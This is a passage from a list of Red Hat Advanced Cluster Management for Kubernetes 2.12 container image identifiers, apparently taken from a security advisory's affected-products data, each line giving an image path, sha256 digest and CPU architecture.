"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
